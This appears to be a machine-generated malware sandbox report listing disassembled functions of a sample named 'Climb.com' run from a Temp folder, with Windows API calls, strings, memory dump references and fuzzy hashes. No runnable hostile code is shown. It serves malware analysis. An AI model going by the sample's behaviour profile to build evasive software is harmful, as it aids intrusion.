Instruction Fuzzy Hash: 0C412B72900218BEDF11DBA4CD42FEEBBB8EF49300F018199EA45B7180DA716F45CB60

Function 00A91A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\768400\Climb.com,00000104), ref: 00A91AD9
_free.LIBCMT ref: 00A91BA4
_free.LIBCMT ref: 00A91BAE

Strings

C:\Users\user\AppData\Local\Temp\768400\Climb.com, xrefs: 00A91AD0, 00A91AD7, 00A91B06, 00A91B3E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\768400\Climb.com
API String ID: 2506810119-1602658879
Opcode ID: c45c4ef55c86aa369ead2d26a8f11b01bbb529c14bc2c67afce9aa284872b6a7
Instruction ID: b63dcf1af29d95226eb33a4795cceb2b0cd7267c735c2f49a46b1975204feac6
Opcode Fuzzy Hash: c45c4ef55c86aa369ead2d26a8f11b01bbb529c14bc2c67afce9aa284872b6a7
Instruction Fuzzy Hash: 0D317E71B40219BFDF21EF99DD85D9EBBFDEF85750B2041A6E80497221E6708E41CB90

Function 00ACCB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ACCBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00ACCBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B329C0,01093C30), ref: 00ACCC40

Strings

0, xrefs: 00ACCB8A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1ebb8c27ddb1ff85fb10b6d35f174419bb65aaf4d4047e393fbf42782e28c0b1
Instruction ID: 0c7e52e240dca7f5860509aacf72e6c5a1ba8b3f33247ee15748a55bf9cd44ea
Opcode Fuzzy Hash: 1ebb8c27ddb1ff85fb10b6d35f174419bb65aaf4d4047e393fbf42782e28c0b1
Instruction Fuzzy Hash: 4841E2312083029FD720DF24D984F6ABBE8EF84724F154A1DF4A997291DB30E904CB62

Function 00AF4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AFDCD0,00000000,?,?,?,?), ref: 00AF4F48
GetWindowLongW.USER32 ref: 00AF4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF4F75

Strings

SysTreeView32, xrefs: 00AF4F1A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 724670f050119005479a89878a6eeb19b3669eb2b6ebc2440439d7e7f2631f0f
Instruction ID: 7715d570810d996767aa52195590d70ca7a28f6ff1339323e2df88e3eee2cc82
Opcode Fuzzy Hash: 724670f050119005479a89878a6eeb19b3669eb2b6ebc2440439d7e7f2631f0f
Instruction Fuzzy Hash: 7C318D31214609AFDB218FB8DC45BEB7BA9EB08338F244715FA79A31E0D770AC519B50

Function 00AE3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AE3AD4,?,?), ref: 00AE3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
_wcslen.LIBCMT ref: 00AE3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00AE3B63

Strings

255.255.255.255, xrefs: 00AE3AF2, 00AE3AF7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 8dce5d23665de5bd2f27782a690e3eb5de2db947cf7895d96746f77319ae1d8a
Instruction ID: 44610b77012304e0da9a31c33e93139ee7b2f18c41b37b31b674c9ac2ff3fa10
Opcode Fuzzy Hash: 8dce5d23665de5bd2f27782a690e3eb5de2db947cf7895d96746f77319ae1d8a
Instruction Fuzzy Hash: E03190366002819FCB10DF6AC589A6977F1EF14324F248159E8178B392D771EE45CB60

Function 00AF4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AF49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AF49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF4A14

Strings

SysMonthCal32, xrefs: 00AF49A7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 4c6308e61a86d40dd6ea02cceddb07272741b21379320a99d71cdd4e92dac073
Instruction ID: 79e71facd936bbf7938716f4658cd9db3d141cb45157cfa4be65461c20a36a29
Opcode Fuzzy Hash: 4c6308e61a86d40dd6ea02cceddb07272741b21379320a99d71cdd4e92dac073
Instruction Fuzzy Hash: AF21AD32610219ABDF129F94DC82FEF3B69EF48728F110214FB556B190D6B5A8519B90

Function 00AF50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AF51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AF51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AF51B8

Strings

msctls_updown32, xrefs: 00AF5122

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 884eae6c4703ad432749ff69b93c7cee23f4ca4379a6fa7f51f125c2888b18a8
Instruction ID: 1ca4fcdb72d3643f9f8f53385d8a46ed0c911dea2f11f467238a95ee433b24e0
Opcode Fuzzy Hash: 884eae6c4703ad432749ff69b93c7cee23f4ca4379a6fa7f51f125c2888b18a8
Instruction Fuzzy Hash: FD2192B5600609BFDB11DFA4CC85EBB37ADEB5A364B100159FA049B361CB30EC11CBA0

Function 00AF4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF4312

Strings

Listbox, xrefs: 00AF42AB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 6b8aa1a019ff6906c2156ffa69285cc64facdeb62559342df345acbaaac8a625
Instruction ID: 859cee1ac02cbf0d994ca54640e8b311d606498f967771a950f435ba353c2deb
Opcode Fuzzy Hash: 6b8aa1a019ff6906c2156ffa69285cc64facdeb62559342df345acbaaac8a625
Instruction Fuzzy Hash: E9215032615118BBEB129FD4DC85FFF3B6EEF89764F118124FA059B190CA719C5287A0

Function 00AD5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AD54A1
SetErrorMode.KERNEL32(00000000,?,?,00AFDCD0), ref: 00AD5515

Strings

%lu, xrefs: 00AD54B4

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 680b6de36e95fff93a1bb1d603713b2dec7b2d9b4c4b77be222d3dae41279c11
Instruction ID: 23369355659a05cde81fae447ed9cc15c58d62871d2db458a87b74b3087bc11e
Opcode Fuzzy Hash: 680b6de36e95fff93a1bb1d603713b2dec7b2d9b4c4b77be222d3dae41279c11
Instruction Fuzzy Hash: CD315370A00109AFD711DF64C985EAA77F9EF05304F148095F509DB362DB71EE45CB61

Function 00AF4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AF4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AF4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AF4D0F

Strings

msctls_trackbar32, xrefs: 00AF4CC4

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a80f53f26d9a2b0e000103139b408bd61c780d851f0d99bc761ab49007ce1656
Instruction ID: de7e62a5e44c894f97b8ba9f1033ad3e4cc79b08be9acb98ed307921e8e180cd
Opcode Fuzzy Hash: a80f53f26d9a2b0e000103139b408bd61c780d851f0d99bc761ab49007ce1656
Instruction Fuzzy Hash: CE11E07124024CBEEF219FA9DC06FBB3BA8EF89B64F110514FA55E60A0D671DC619B20

Function 00AC389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

Part of subcall function 00AC36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC3712
Part of subcall function 00AC36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3723
Part of subcall function 00AC36F4: GetCurrentThreadId.KERNEL32 ref: 00AC372A
Part of subcall function 00AC36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC3731

GetFocus.USER32 ref: 00AC38C4

Part of subcall function 00AC373B: GetParent.USER32(00000000), ref: 00AC3746

GetClassNameW.USER32(?,?,00000100), ref: 00AC390F
EnumChildWindows.USER32(?,00AC3987), ref: 00AC3937

Strings

%s%d, xrefs: 00AC394B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: a83540db4adc7d55b95bce7cb30b824ebaad5774a63874e06f8104472a8c7cc8
Instruction ID: bae33b7f99755081e9af8979c4aa4fd4f020e1da26cb86a159fe54eb8cd8e260
Opcode Fuzzy Hash: a83540db4adc7d55b95bce7cb30b824ebaad5774a63874e06f8104472a8c7cc8
Instruction Fuzzy Hash: 4E11A872600205ABCF11BFB49D95FFD77BAAF94304F058069F9099B252DE705905DB20

Function 00AF6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AF638D
DrawMenuBar.USER32(?), ref: 00AF639C

Strings

0, xrefs: 00AF632E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 27055ae8f9b38f414f38b3b6021490bdc6cc685fc5c2652ea8aca5e8b2b183ba
Instruction ID: 8926362c603d9f7ab4e33fe076ab03bcb5caf1ea0a21cdb8964d3b6d835a33f5
Opcode Fuzzy Hash: 27055ae8f9b38f414f38b3b6021490bdc6cc685fc5c2652ea8aca5e8b2b183ba
Instruction Fuzzy Hash: C501C032500208AFDB119F90DC88FBEBBB5FF45314F108199F909DA150CB308A85EF21

Function 00ABE778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00ABE797
FreeLibrary.KERNEL32 ref: 00ABE7BD

Strings

GetSystemWow64DirectoryW, xrefs: 00ABE791
X64, xrefs: 00ABE680

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 7318d5050fc19ceba91453fa127b7678077b51d2f19551e06e611c81d392b012
Instruction ID: 2c82202368e3bd9d1b83bec08d2c8e284f52cc8787502f7b8b1b1a8c54334a13
Opcode Fuzzy Hash: 7318d5050fc19ceba91453fa127b7678077b51d2f19551e06e611c81d392b012
Instruction Fuzzy Hash: 02E022718026219FD733C7A04C98EF9333D6F20B00B2446A8FC06E6052EB30CD84CA98

Function 00AC096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35982bc8a07f4b0deaa102f44e96d1b92fc794d77b783a56eb60b5a6705b9539
Instruction ID: fb2509f85372b7a662945857d64cd6548d1a2ab812d7816e45dc363de7ff3875
Opcode Fuzzy Hash: 35982bc8a07f4b0deaa102f44e96d1b92fc794d77b783a56eb60b5a6705b9539
Instruction Fuzzy Hash: 03C14975A0021AEFDB14CF98C894FAAB7B5FF48704F128598E506EB251D731EE81DB90

Function 00A941F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A9427E
__alldvrm.LIBCMT ref: 00A9447F
__alldvrm.LIBCMT ref: 00A944A1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: a858aebb6de8b251f358345b1ec61f54d43f4ae8dc1689c7bb4a58c0b7cd8924
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 95A14772B007869FEF21CF28C891FAEBBE4EF59314F2442A9E5959F281D3349942C750

Function 00AC0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0EF8
CLSIDFromProgID.OLE32(?,?,00000000,00AFDCE0,000000FF,?,00000000,00000800,00000000,?,00B00BD4,?), ref: 00AC0F1D
_memcmp.LIBVCRUNTIME ref: 00AC0F3E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 7fc0eeb53540b41bee790a5bbe2fb9bc72a3609cf38ac6124258ef943a0031e2
Instruction ID: 61120db2b4660fd0d27516bb7360ecd1c47d7c1788e26003ab871cd77773136c
Opcode Fuzzy Hash: 7fc0eeb53540b41bee790a5bbe2fb9bc72a3609cf38ac6124258ef943a0031e2
Instruction Fuzzy Hash: 13811771A00109EFCB14DFD8C984EEEB7B9FF89315F214598E506AB250DB71AE46CB60

Function 00AEB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AEB10C
Process32FirstW.KERNEL32(00000000,?), ref: 00AEB11A

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Process32NextW.KERNEL32(00000000,?), ref: 00AEB1FC
CloseHandle.KERNEL32(00000000), ref: 00AEB20B

Part of subcall function 00A7E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AA4D73,?), ref: 00A7E395

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 11e5b9da9dd0dd2d80b645225b7046d3c7b6cb9c096ed2492bad1923263be965
Instruction ID: 217729017b19c969185cc5928059dfd4038fe6b014cfd6f5354a858b10e2ccc6
Opcode Fuzzy Hash: 11e5b9da9dd0dd2d80b645225b7046d3c7b6cb9c096ed2492bad1923263be965
Instruction Fuzzy Hash: 895149B1518300AFD310EF24C986A6BBBF8FF88754F40891DF58997261EB30D905CBA2

Function 00AA1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AA1840

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8033595bf1dadb8411e30a8a6d70b0eaece3a29c8cd2446f1481049945111c60
Instruction ID: 059510c3afd3c828ab600aa98cf4a60174ae15eb843561f2f8c9491728bc4dc2
Opcode Fuzzy Hash: 8033595bf1dadb8411e30a8a6d70b0eaece3a29c8cd2446f1481049945111c60
Instruction Fuzzy Hash: 3041F231A00151BADB217BB98D86ABE3AE4EF5B770F140625F818E71D1EB39494187A1

Function 00AE2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00AE255A
